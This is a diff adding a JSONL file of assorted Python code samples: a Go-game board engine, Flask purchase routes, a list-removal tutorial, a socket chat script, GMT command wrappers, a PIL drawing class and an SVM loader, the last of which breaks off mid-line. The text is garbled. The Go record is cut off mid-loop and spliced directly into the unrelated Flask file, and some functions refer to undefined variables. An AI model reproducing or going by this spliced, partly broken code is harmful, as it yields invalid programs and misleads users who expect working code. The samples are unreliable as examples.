diff --git "a/2900.jsonl" "b/2900.jsonl" new file mode 100644--- /dev/null +++ "b/2900.jsonl" @@ -0,0 +1,614 @@ +{"seq_id":"70558639","text":"# Plotting, printing output, calling other function\nimport networkx as nx\nfrom itertools import product\nimport graphic as gr\nimport pm\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport time\n\ndebug = False \n\nsize = pm.size\n\nG = nx.grid_graph([size,size])\n\ndef plot(board,turn,pos,player):\n\tstate = np.zeros((size,size))\n\tfor i,j in board[1]:\n\t\tstate[i][j] = 1\n\tfor i,j in board[2]:\n\t\tstate[i][j] = 2\n\n\t# Make this plot True to save image to disk\n\timg = gr.go(state, turn, points, pos, player, plot = True) # or you can pass points if you want to display area too\n\n\t# Make this True to see board state as a popup\n\tif(False):\n\t\t# Display board state\n\t\tplt.close()\n\t\tplt.imshow(img)\n\t\tplt.show(block=False)\n\n# capture pieces that that now covered due to move played at pos\ndef capture(player, boardTemp, pos):\n\tpieces = 0\n\n\t# no need to check\n\t# check if empty spaces nearby have been covered due to this move\n\tchanged = list(G.neighbors(pos))+[pos] # The only positions that can be effected\n\tfor n in changed:\n\t\t# consider the subgraph formed by pieces placed by enemy, what is the connected\n\t\t# component of node n in this subgraph\n\t\tenemy = 1 if player == 2 else 2\n\t\t\n\t\tsub = G.subgraph(boardTemp[enemy])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the following enemy subgraph is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\t\t\t\tprint(\"the boundary for this cc is\")\n\t\t\tboundary = nx.node_boundary(G,cc) # get all the liberties of this CC of your enemy\n\t\t\t\n\t\t\t# check if you cover this cc\n\t\t\tif(boundary.issubset(set(boardTemp[player]))):\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"The cc has been captured by you!!\")\n\t\t\t\tboardTemp[enemy] = [e for e in boardTemp[enemy] if e not in cc] # capture the pieces\n\t\t\t\tpoints[player] += len(cc) # update points\n\t\t\t\tpiecesCaptured[player] += len(cc)\n\t\t\t\tboardTemp[0] += list(cc) # update that new positions have been emptied up\n\t\t\t\tpieces += len(list(cc))\n\t\t\t\n\n\t\t# Optional Rule 7A NOT IN EFFECT - (Self-capture) is allowed\n\t\tsub = G.subgraph(boardTemp[player])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the player subgraph is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\t\t\t\tprint(\"the boundary for this cc is\")\n\t\t\tboundary = nx.node_boundary(G,cc) # get all the liberties of this CC\n\t\t\t\n\t\t\tif(boundary.issubset(set(boardTemp[enemy]))):\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"Your cc has been captured by SELF CAPTURE!!\")\n\t\t\t\tboardTemp[player] = [e for e in boardTemp[player] if e not in cc] # capture the pieces\n\t\t\t\tpoints[enemy] += len(cc) # update points\n\t\t\t\tpiecesCaptured[enemy] += len(cc)\n\t\t\t\tboardTemp[0] += list(cc) # update that new positions have been emptied up\n\t\t\t\tpieces -= len(list(cc))\n\n\treturn pieces\n\ndef updatePoints(player, boardTemp, pos):\n\t# check if empty spaces nearby have been covered due to this move\n\tchanged = list(G.neighbors(pos))+[pos]\n\tenemy = 1 if player == 2 else 2\n\n\treward = 0\n\n\t# if you fill in your already captured SINGLE point area\n\tfor oldArea in 
captured_area[player]:\n\t\tif((oldArea == set([pos]))):\n\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\tpoints[player] -= len(oldArea)\n\t\t\treward -= len(oldArea)\n\n\t# if you capture an enemy by filling in the single point they used to hold\n\tfor oldArea in captured_area[enemy]:\n\t\tif((oldArea == set([pos]))):\n\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t# no need to update reward since the blank area thus formed will have player as boundary\n\t\t\tpoints[enemy] -= len(oldArea)\n\n\tfor n in changed:\n\t\tsub = G.subgraph(boardTemp[0])\n\t\tif(n in sub):\n\t\t\tcc = nx.node_connected_component(sub,n)\n\t\t\tif(debug):\n\t\t\t\tprint(\"===\")\n\t\t\t\tprint(\"The connected components of \"+str(n)+\" in the subgraph of empty spaces is\")\n\t\t\t\tprint(sub)\n\t\t\t\tprint(cc)\n\n\t\t\tboundary = nx.node_boundary(G,cc)\n\t\t\tif(boundary.issubset(set(boardTemp[enemy]))):\n\t\t\t\tnot_tabulated = True\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"This cc is covered by player \"+str(enemy))\n\t\t\t\tfor oldArea in captured_area[enemy]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink, should run only once for a single oldArea\n\t\t\t\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t\t\t\tpoints[enemy] -= len(oldArea)\n\t\t\t\t\t\treward += len(oldArea)\n\t\t\t\t\t\t\n\t\t\t\t\t\tcaptured_area[enemy].append(cc)\n\t\t\t\t\t\tpoints[enemy] += len(cc)\n\t\t\t\t\t\treward -= len(cc)\n\n\t\t\t\t\t\tnot_tabulated = False\n\t\t\t\t\t\tif(debug):\n\t\t\t\t\t\t\tprint(\"cc is a subset of Old area ->\")\n\t\t\t\t\t\t\tprint(oldArea)\n\n\t\t\t\tif(not_tabulated):\n\t\t\t\t\tcaptured_area[enemy].append(cc)\n\t\t\t\t\tpoints[enemy] += len(cc)\n\t\t\t\t\treward -= len(cc) # since enemy gained\n\t\t\t\t\tif(debug):\t\n\t\t\t\t\t\tprint(\"fresh entry into captured_area\")\n\n\t\t\telif(boundary.issubset(set(boardTemp[player]))):\n\t\t\t\tnot_tabulated = True\n\t\t\t\tif(debug):\n\t\t\t\t\tprint(\"This cc is covered by player \"+str(player))\n\n\t\t\t\tfor oldArea in captured_area[player]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink,\n\t\t\t\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\t\t\t\tpoints[player] -= len(oldArea)\n\t\t\t\t\t\treward -= len(oldArea)\n\n\t\t\t\t\t\tcaptured_area[player].append(cc)\n\t\t\t\t\t\tpoints[player] += len(cc)\n\t\t\t\t\t\treward += len(cc)\n\n\t\t\t\t\t\tnot_tabulated = False\n\t\t\t\t\t\tif(debug):\n\t\t\t\t\t\t\tprint(\"cc is a subset of Old area ->\")\n\t\t\t\t\t\t\tprint(oldArea)\n\n\t\t\t\tif(not_tabulated):\n\t\t\t\t\tcaptured_area[player].append(cc)\n\t\t\t\t\tpoints[player] += len(cc)\n\t\t\t\t\treward += len(cc)\n\t\t\t\t\tif(debug):\n\t\t\t\t\t\tprint(\"fresh entry into captured_area\")\n\t\t\telse:\n\t\t\t\t# if this connected commponent is now under contention\n\t\t\t\t# we need to remove it from captured_area if it used to exist.\n\t\t\t\tfor oldArea in captured_area[player]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink!! no new owner\n\t\t\t\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\t\t\t\tpoints[player] -= len(oldArea)\n\t\t\t\t\t\treward -= len(oldArea)\n\n\t\t\t\tfor oldArea in captured_area[enemy]:\n\t\t\t\t\tif(cc.issubset(oldArea)):\n\t\t\t\t\t\t# old territory can shrink!! 
no new owner\n\t\t\t\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\t\t\t\tpoints[enemy] -= len(oldArea)\n\t\t\t\t\t\treward += len(oldArea)\n\tif(debug):\n\t\tprint(\"\\n\\nPlayer \"+str(player)+\" played at position \"+str(pos)+\" and got a reward of \")\n\treturn reward\n\n\t# One more case is if the single blank spot is now taken over by a colored piece\n\t# no longer blank so, no subgraph formed.\n\tfor oldArea in captured_area[player]:\n\t\tif(oldArea == set([pos])):\n\t\t\tcaptured_area[player].remove(oldArea)\n\t\t\tpoints[player] -= len(oldArea)\n\tfor oldArea in captured_area[enemy]:\n\t\tif(oldArea == set([pos])):\n\t\t\tcaptured_area[enemy].remove(oldArea)\n\t\t\tpoints[enemy] -= len(oldArea)\n\n# player can be 1 or 2, white or black, pos is a tuple of (i,j)\ndef play(player, pos, boardTemp):\n\t# ensure these variables is treated as a global variable\n\tglobal board, turn \n\tboard = boardTemp\n\n\tif(debug):\t\n\t\tprint(\"\\n\\nTurn Number \"+ str(turn) +\" player \"+str(player)+\" is trying to play at position \"+str(pos))\n\t\tprint(points)\n\t\n\t# check if position is free of any other piece\n\tif(pos in board[0]):\n\t\t#boardTemp = board # making copy might take time? needed for Rule 8\n\t\tboardTemp[0].remove(pos)\n\t\tboardTemp[player].append(pos)\n\t\trewardPieces = capture(player, boardTemp, pos)\n\t\trewardArea = updatePoints(player, boardTemp, pos)\n\t\tif(debug):\n\t\t\tprint(str(rewardArea+rewardPieces))\n\n\t\t# Rule 8 Prohibition of repetition TO DO\n\t\thist.append(boardTemp)\n\t\tboard = boardTemp\n\t\tplot(board,turn,pos,player)\n\t\tif(debug):\t\n\t\t\tprint(\"\\n\\nThe following is the captured area currently\")\n\t\t\tprint(captured_area)\n\t\tturn += 1\n\t\treturn (board, rewardArea+rewardPieces)\n\tif(debug):\n\t\tprint(\"You can only play on empty positions\")\n\treturn (board, -1*size*size) # is this sufficient penalty?\n\nboard = {1:[], 2:[]}\npoints = {1:0, 2:0} # pieces captured + total area under control right now \npiecesCaptured = {1:0, 2:0}\n\n# list of sets of nodes currently under control of respective player\ncaptured_area = { 1:[], 2:[]}\n\nturn = 1\nhist = [] # history of board positions\n\nboard[0] = list(set(list(product(range(size), repeat = 2))))\n\n# dictionary to matrix representation\ndef boardToState(b):\n\tstate = np.zeros((size,size))\n\tfor i,j in b[1]:\n\t\tstate[i][j] = 1\n\tfor i,j in b[2]:\n\t\tstate[i][j] = 2\n\treturn state\n\n# state is a numpy matrix of n,n 'action' is a position to play by 'player' [0,n^2-1], player is 1 or 2 depending on white or black\ndef go(state, action, player):\n\ty, x = gr.location_to_cordinate([action],size = pm.size, box = 1)[0]\n\taction = (x,y)\n\n\tb = {0:[], 1:[], 2:[]}\n\tfor i in range(size):\n\t\tfor j in range(size):\n\t\t\tif(state[i][j] == 0):\n\t\t\t\tb[0].append((i,j))\n\t\t\telif(state[i][j] == 1):\n\t\t\t\tb[1].append((i,j))\n\t\t\telif(state[i][j] == 2):\n\t\t\t\tb[2].append((i,j))\n\n\tif(debug):\n\t\tprint(board)\n\ts2, reward = play(player,action, b)\n\treturn boardToState(s2), reward\n\n''' Normal human play '''\ndef humanPlay(randomStart = False):\n\tif(randomStart):\n\t\ttotal = list(set(list(product(range(size), repeat = 2))))\n\n\t\tboard[1] = random.sample(total,size*size//3)\n\t\tboard[2] = random.sample(list(set(total) - set(board[1])),size*size//3)\n\t\t# initially all positions belong to blank - set(board[1]) - set(board[2]))\n\t\tboard[0] = list(set(total) - set(board[1]) - set(board[2]))\n\telse:\n\t\tboard = {1:[], 2:[]}\n\t\tboard[0] = 
list(set(list(product(range(size), repeat = 2))))\n\n\tmove = 'y'\n\tplayer = 2\n\t\t\n\twhile(move!='q'):\n\t\tmove = input()\n\t\tif(not(play(player%2+1, tuple(map(int,move.split(' ')))))):\n\t\t\tcontinue # invalid move same player tries again\n\t\tplayer += 1 \n\n\n\ndef randAgents():\n\tgameNumber = 0\n\n\t# Number of games to be played\n\tfor i in range(100000):\n\t\ttext_file = open(pm.myHomeFolder + \"\\\\data\\\\gameNumber\"+str(gameNumber)+\".txt\", \"w\")\n\t\tplayer = 1\n\t\tgameNumber += 1\n\n\t\tboard = {1:[], 2:[]}\n\t\tpoints = {1:0, 2:0}\n\t\tturn = 0 \n\t\thist = [] # history of board positions\n\n\t\t# initially all positions belong to blank - set(board[1]) - set(board[2]))\n\t\tboard[0] = list(set(list(product(range(size), repeat = 2))))\n\t\t\n\t\twhile(turn>>>>>>>>>>>>>>>>\", kitchen_purchases, brand_purchases)\n\n    total_purchases = KitchenStockPurchase.get_total_price(KitchenStockPurchase, purchases=kitchen_purchases) + Purchase.get_total_price(Purchase, purchases=brand_purchases)\n\n    return render_template(\"manager/purchases.html\", mod=module, kitchen_purchases=kitchen_purchases, total_purchases=total_purchases, kitchen_items=kitchen_items, drink_items=drink_items, item_id=item, brand_purchases=brand_purchases, tomorrow=to, today=_from)\n\n\n@purchase.route('/delete-purchase', methods=[\"POST\"])\n@login_required\ndef delete_purchase():\n    purchase_id = request.form[\"purchase-id\"]\n    purchase = Purchase.read_one(Purchase, purchase_id)\n    Purchase.delete(purchase)\n    session.close()\n    flash(\"Purchase (\"+ purchase_id +\") was deleted successfully\", \"info\")\n    return redirect(url_for('purchase.get_purchases'))\n\n\n@purchase.route('/delete-kitchen-purchase', methods=[\"POST\"])\n@login_required\ndef delete_kitchen_purchase():\n    purchase_id = request.form[\"kitchen-purchase-id\"]\n    purchase = KitchenStockPurchase.read_one(KitchenStockPurchase, purchase_id)\n    KitchenStockPurchase.delete(purchase)\n    session.close()\n    flash(\"Kitchen Purchase (\"+ purchase_id +\") was deleted successfully\", \"info\")\n    return redirect(url_for('purchase.get_purchases'))","sub_path":"Application/blueprints/Purchase/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"593625302","text":"#remove, clear\n\n\n#declare the lists\nlist_a = [1 ,2, 3, 4 ,5, 6]\nlist_b = [1 ,2, 3, 4 ,5, 6]\nlist_c = [1 ,2, 3, 4 ,5, 6]\nlist_d = [1 ,2, 3, 4 ,5, 6]\n#removal method 1---remove slot 1 out of slots 0 1 2 3 4 5\ndel list_a[1]\nprint(\"del list_a[1]:\",list_a)\n\n#removal method pop------remove slot 2\nlist_b.pop(2)\nprint(\"pop(2):\",list_b)\n\n#remove-----remove a specific value \nlist_c.remove(3) #(\"value to remove\")\nlist_c\n\n\n#clear\nlist_d.clear()\nprint(\"clear:\",list_d)\n\n\n","sub_path":"Python/list_remove_clear.py","file_name":"list_remove_clear.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"285189208","text":"import socket\nimport os\nimport threading\n\ndef receive(connection):\n    while True:\n        buff = connection.recv(4096)\n        message = buff.decode()\n        print(\"Friend: \" + message)\n\n\n\nprint(\"-----------------------------\")\nprint(\"Would you like to connect to somebody or wait for connection?\\n1 Connect to Somebody\\n2 Wait for Connection\")\ndecinput = input()\nif decinput == str(1):\n    \n    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n    path = os.getcwd()\n    print(\"-----------------------------\")\n    print(\"To 
Connect, Use \\\"connect \\\"\")\n connectflag = False\n while True:\n cmd_input = input()\n if cmd_input.split(' ')[0] == \"connect\" and connectflag == False:\n client.connect((cmd_input.split(' ')[1], int(cmd_input.split(' ')[2])))\n connectflag = True\n t1 = threading.Thread(target=receive, args=(client,))\n t1.start()\n print(\"-Connected to another person!\")\n print(\"-----------------------------\")\n print(\"-Send messages by typing into the command line!\\n-Ctrl-C to quit\")\n \n if cmd_input.split(' ')[0] != \"connect\":\n client.sendall(bytes(cmd_input, 'UTF-8'))\n #print(\"You: \" + cmd_input)\n \nelif decinput == str(2):\n LOCALHOST = \"127.0.0.1\"\n PORT = 8085\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind((LOCALHOST, PORT))\n server.listen(10)\n print(\"Waiting for peer to connect\")\n msg = ''\n path = os.getcwd()\n clientConnection, clientAddress = server.accept()\n print(\"Connected peer :\", clientAddress)\n t1 = threading.Thread(target=receive, args=(clientConnection,))\n t1.start()\n while True:\n msginput = input()\n clientConnection.send(bytes(msginput, \"UTF-8\"))\n #print(\"You: \" + msginput)\n\n print(\"Peer disconnected...\")\n clientConnection.close()\n\n","sub_path":"peer2.py","file_name":"peer2.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67093572","text":"import cx_Freeze\r\nimport sys\r\n\r\nsys.argv.append(\"build\")\r\n\r\nexecutables = [cx_Freeze.Executable(\"GAME1_2.py\")]\r\ncx_Freeze.setup(\r\n name = \"GAME1\",\r\n options = {\"build_exe\":{\"packages\":[\"pygame\"],\"include_files\":['racecar.png','car_icon.png','Crash.wav','Jazz_In_Paris.wav']}},\r\n executables = executables\r\n )\r\n","sub_path":"Python/game 1_version 2/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"633504895","text":"### gmtfun.py\n##\n## Copyright (c) 2010 - 2020 CIRES Coastal DEM Team\n##\n## Permission is hereby granted, free of charge, to any person obtaining a copy \n## of this software and associated documentation files (the \"Software\"), to deal \n## in the Software without restriction, including without limitation the rights \n## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies \n## of the Software, and to permit persons to whom the Software is furnished to do so, \n## subject to the following conditions:\n##\n## The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n##\n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, \n## INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR \n## PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE \n## FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, \n## ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n##\n### Code:\n\nfrom utils import *\n\ndef gmt_inc2inc(inc_str):\n units = inc_str[-1]\n\n if units == 'c': ## arc-seconds (old)\n inc = float(inc_str[:-1]) / 3600\n elif units == 's': ## arc-seconds\n inc = float(inc_str[:-1]) / 3600\n elif units == 'm': ## arc-minutes\n inc = float(inc_str[:-1]) / 360\n else: inc = float(inc_str) \n \n return(inc)\n\n## =============================================================================\n##\n## GMT Wrapper Functions - gmtfun.py\n## wrapper functions to GMT system commands\n##\n## =============================================================================\n\ndef gmt_inf(src_xyz):\n '''generate an info (.inf) file from a src_xyz file using GMT.'''\n if os.path.exists(src_grd):\n return(run_cmd('gmt gmtinfo {} -C > {}.inf'.format(src_xyz, src_xyz), verbose = False))\n else: return(None)\n\ndef gmt_grd_inf(src_grd):\n '''generate an info (.inf) file from a src_grd file using GMT.'''\n if os.path.exists(src_grd):\n return(run_cmd('gmt grdinfo {} -C > {}.inf'.format(src_grd, src_grd), verbose = False))\n else: return(None)\n\ndef gmt_grd2gdal(src_grd, dst_fmt = 'GTiff', epsg = 4326, verbose = False):\n '''Convert the grd file to tif using GMT'''\n if os.path.exists(src_grd):\n dst_gdal = '{}.{}'.format(os.path.basename(src_grd).split('.')[0], gdalfun._fext(dst_fmt))\n grdc_cmd = ('gmt grdconvert {} {}=gd+n-9999:{} -V\\\n '.format(src_grd, dst_gdal, dst_fmt))\n out, status = run_cmd(grdc_cmd, verbose = verbose)\n if status != 0: dst_gdal = None\n else: dst_gdal = None\n return(dst_gdal)\n\ndef grdinfo(src_grd, verbose = False):\n '''Return an info list of `src_grd`'''\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = SPACE', verbose = verbose)\n if os.path.exists(src_grd):\n grdinfo_cmd = ('gmt grdinfo {} -C'.format(src_grd))\n out, status = run_cmd(grdinfo_cmd, verbose = verbose)\n remove_glob('gmt.conf')\n if status == 0:\n return(out.split())\n else: return(None)\n else: return(None)\n\ndef gmtinfo(src_xyz, verbose = False):\n '''Return an info list of `src_xyz`'''\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = SPACE', verbose = verbose)\n if os.path.exists(src_xyz):\n gmtinfo_cmd = ('gmt gmtinfo {} -C'.format(src_xyz))\n out, status = run_cmd(gmtinfo_cmd, verbose = verbose)\n remove_glob('gmt.conf')\n if status == 0:\n return(out.split())\n else: return(None)\n else: return(None)\n\ndef gmt_block(datalist, mode = 'blockmean', inc = '1s', o_name = None, delim = 'SPACE', weights = False, verbose = False):\n '''run block/mean/median on src_xyz'''\n if mode == 'blockmean' or mode == 'blockmean':\n out, status = run_cmd('gmt gmtset IO_COL_SEPARATOR = {}'.format(delim.upper()), verbose = verbose)\n if mode == 'blockmean' and weights:\n mode = 'blockmean -Wi'\n datalist.want_weights = True\n if mode == 'blockmedian': mode = 'blockmedian -Q'\n if o_name is None: o_name = datalist._name\n if delim.lower() == 'comma':\n out_ext = 'csv'\n o_vrt = open('{}.vrt'.format(o_name), 'w')\n t = '''\n \n {}.csv\n wkbPoint\n \n \n'''.format(o_name, o_name)\n o_vrt.write(t)\n o_vrt.close()\n\n else: out_ext = 'xyz'\n \n if os.path.exists(datalist._path):\n blk_cmd1 = ('gmt {} -V {} -I{} > {}.{}'.format(mode, datalist.region.gmt, inc, o_name, out_ext))\n out, status = run_cmd(blk_cmd1, 
verbose = True, data_fun = datalist._dump_data)\n else: status = -1\n else: status = -1\n remove_glob('gmt.conf')\n \n return(status)\n \ndef gmtselect_split(o_xyz, sub_region, sub_bn, verbose = False):\n '''split an xyz file into an inner and outer region.'''\n\n status = 0\n out_inner = None\n out_outer = None\n\n gmt_s_inner = 'gmt gmtselect -V {} {} > {}_inner.xyz'.format(o_xyz, sub_region.gmt, sub_bn)\n out, status = run_cmd(gmt_s_inner, verbose = verbose)\n\n if status == 0: out_inner = '{}_inner.xyz'.format(sub_bn)\n\n gmt_s_outer = 'gmt gmtselect -V {} {} -Ir > {}_outer.xyz'.format(o_xyz, sub_region.gmt, sub_bn)\n out, status = run_cmd(gmt_s_outer, verbose = verbose)\n\n if status == 0: out_outer = '{}_outer.xyz'.format(sub_bn)\n\n return([out_inner, out_outer])\n \ndef grdcut(src_grd, src_region, dst_grd, verbose = False):\n '''Cut `src_grd` to `src_region` '''\n\n status = 0\n if os.path.exists(src_grd):\n cut_cmd1 = ('gmt grdcut -V {} -G{} {}'.format(src_grd, dst_grd, src_region.gmt))\n out, status = run_cmd(cut_cmd1, verbose = verbose)\n else: status = -1\n\n return(status)\n\ndef grdfilter(src_grd, dst_grd, dist = '3s', verbose = False):\n '''filter `src_grd` '''\n\n status = 0\n if os.path.exists(src_grd):\n ft_cmd1 = ('gmt grdfilter -V {} -G{} -R{} -Fc{} -D1'.format(src_grd, dst_grd, src_grd, dist))\n out, status = run_cmd(ft_cmd1, verbose = verbose)\n else: status = -1\n\n return(status)\n\ndef grd2xyz(src_grd, dst_xyz, region = None, mask = None, verbose = False, want_datalist = False):\n '''Convert `src_grd` to xyz possibly using a nodata mask and/or a region.\n Optionally, generate a datalist and inf file for the resultant xyz data.'''\n\n status = 0\n if mask:\n grdmask_cmd = ('gmt grdmath -N -V {} {} OR = tmp.grd'.format(src_grd, mask))\n out, status = run_cmd(grdmask_cmd, verbose = verbose)\n if status == 0: \n src_grd = 'tmp.grd'\n\n if region and region._valid:\n region_str = region.gmt\n else: region_str = ''\n\n grd2xyz_cmd = ('gmt grd2xyz -V {} -s {} > {}'.format(src_grd, region_str, dst_xyz))\n out, status = run_cmd(grd2xyz_cmd, verbose = verbose)\n\n if status == 0:\n if mask:\n if os.path.exists('tmp.grd'):\n os.remove('tmp.grd')\n\n if want_datalist:\n s_datalist = datalist('{}.datalist'.format(dst_xyz.split('.')[0]))\n s_datalist._append_datafile(['{}'.format(os.path.basename(dst_xyz)), 168, 1])\n s_datalist._reset()\n\n mb_inf(s_datalist._path, -1)\n \n return(status)\n\ndef slope(src_dem, dst_slp, verbose = False):\n '''Generate a Slope grid from a DEM with GMT'''\n\n status = 0\n o_b_name = '{}'.format(src_dem.split('.')[0])\n\n slope_cmd0 = ('gmt grdgradient -V -fg {} -S{}_pslp.grd -D -R{}\\\n '.format(src_dem, o_name, src_dem))\n out, status = run_cmd(slope_cmd0, verbose = verbose)\n\n if status == 0:\n slope_cmd1 = ('gmt grdmath -V {}_pslp.grd ATAN PI DIV 180 MUL = {}\\\n '.format(o_b_name, dst_slp))\n out, status = run_cmd(slope_cmd1, verbose = verbose)\n \n if os.path.exists('{}_pslp.grd'.format(o_b_name)):\n os.remove('{}_pslp.grd'.format(o_b_name))\n\n return(status)\n\ndef num_msk(num_grd, dst_msk, verbose = False):\n '''Generate a num-msk from a NUM grid.'''\n\n status = 0\n\n num_msk_cmd = ('gmt grdmath -V {} 0 MUL 1 ADD 0 AND = {}\\\n '.format(num_grd, dst_msk))\n out, status = run_cmd(num_msk_cmd, verbose = verbose)\n\n return(status)\n\ndef xyz2grd(datalist, region, inc, dst_name, a = 'n', node = 'pixel', verbose = False):\n '''Run the GMT command `xyz2grd` given a datalist, region and increment.'''\n \n status = 0\n if node == 'pixel':\n 
reg_str = '-r'\n else: reg_str = ''\n \n num_cmd0 = ('gmt xyz2grd -V {} -I{:.10f} -G{} -A{} {}\\\n '.format(region.gmt, inc, dst_name, a, reg_str))\n out, status = run_cmd(num_cmd0, verbose = verbose, data_fun = datalist._dump_data)\n\n return(out, status)\n### End\n","sub_path":"geomods-old/gmtfun.py","file_name":"gmtfun.py","file_ext":"py","file_size_in_byte":9042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"455126338","text":"from PIL import Image, ImageDraw, ImageFont, ImageFile\n\nclass Drawing:\n\tdef __init__(self, g_map=\"\", *args, **kwargs):\n\t\tself.mark_map = g_map\n\n\tdef hello_world(self):\n\t\t# get an image\n\t\tbase = Image.open(self.mark_map).convert('RGBA')\n\n\t\t# make a blank image for the text, initialized to transparent text color\n\t\ttxt = Image.new('RGBA', base.size, (255,255,255,0))\n\n\t\t# get a font\n\t\tfnt = ImageFont.truetype('FreeMono.ttf', 40)\n\t\t# get a drawing context\n\t\td = ImageDraw.Draw(txt)\n\n\t\t# draw text, half opacity\n\t\td.text((10,10), \"Hello\", font=fnt, fill=(255,255,255,128))\n\t\t# draw text, full opacity\n\t\td.text((10,60), \"World\", font=fnt, fill=(255,255,255,255))\n\n\t\tout = Image.alpha_composite(base, txt)\n\n\t\tout.save(self.mark_map)","sub_path":"Python/Capstone/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377250710","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLoads pretrained final SVM\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.models import Model\r\nfrom sklearn.externals import joblib\r\n\r\ndef get_subSVM_outs(features, data, subSVMs, number_of_classes):\r\n feature1_train, feature1_test,\\\r\n feature2_train, feature2_test,\\\r\n feature3_train, feature3_test = features\r\n \r\n X_train, y_train, X_test, y_test = data\r\n \r\n subSVM1, subSVM2, subSVM3 = subSVMs\r\n \r\n subSVM1_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM1_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n subSVM2_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM2_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n subSVM3_train_out = np.zeros((y_train.shape[0],number_of_classes))\r\n subSVM3_test_out = np.zeros((y_test.shape[0],number_of_classes))\r\n for i in range(number_of_classes):\r\n # predict_proba outputs 2 columns and m rows.\r\n # the 2 columns are as such: [prob of 0, prob of 1]\r\n # I will be taking the prob of 1 moving forward\r\n print(i)\r\n subSVM1_train_out[:,i] = subSVM1[i].predict_proba(feature1_train)[:,1]\r\n subSVM1_test_out[:,i] = subSVM1[i].predict_proba(feature1_test)[:,1]\r\n subSVM2_train_out[:,i] = subSVM2[i].predict_proba(feature2_train)[:,1]\r\n subSVM2_test_out[:,i] = subSVM2[i].predict_proba(feature2_test)[:,1]\r\n subSVM3_train_out[:,i] = subSVM3[i].predict_proba(feature3_train)[:,1]\r\n subSVM3_test_out[:,i] = subSVM3[i].predict_proba(feature3_test)[:,1]\r\n \r\n subSVM_concat_train_out = np.hstack([subSVM1_train_out, subSVM2_train_out, subSVM3_train_out])\r\n subSVM_concat_test_out = np.hstack([subSVM1_test_out, subSVM2_test_out, subSVM3_test_out])\r\n \r\n return subSVM_concat_train_out, subSVM_concat_test_out\r\n\r\ndef load(data, features, subSVMs, number_of_classes, get_accuracies='True'): \r\n X_train, y_train, X_test, y_test = data\r\n \r\n print('loading pre-trained final SVM model...')\r\n 
finalSVM = joblib.load('saved_finalSVM.pkl')\r\n \r\n if get_accuracies=='True':\r\n print('\\nFinding accuracies of trained final SVM')\r\n subSVM_concat_train_out,\\\r\n subSVM_concat_test_out = get_subSVM_outs(features, data, subSVMs, number_of_classes)\r\n \r\n accuracy_test = [] \r\n accuracy_train = []\r\n \r\n for i in range(number_of_classes):\r\n print('final SVM model, number:',i)\r\n # predicted train and test values for a certain number, i \r\n yhat1_train = finalSVM[i].predict(subSVM_concat_train_out)\r\n print(yhat1_train.shape)\r\n print(yhat1_train)\r\n yhat1_test = finalSVM[i].predict(subSVM_concat_test_out)\r\n # test and train accuracies for that number\r\n accte = np.mean(yhat1_test == y_test[:,i])\r\n acctr = np.mean(yhat1_train == y_train[:,i])\r\n accuracy_test.append(accte)\r\n accuracy_train.append(acctr)\r\n \r\n # plotting individual SVMs\r\n x = 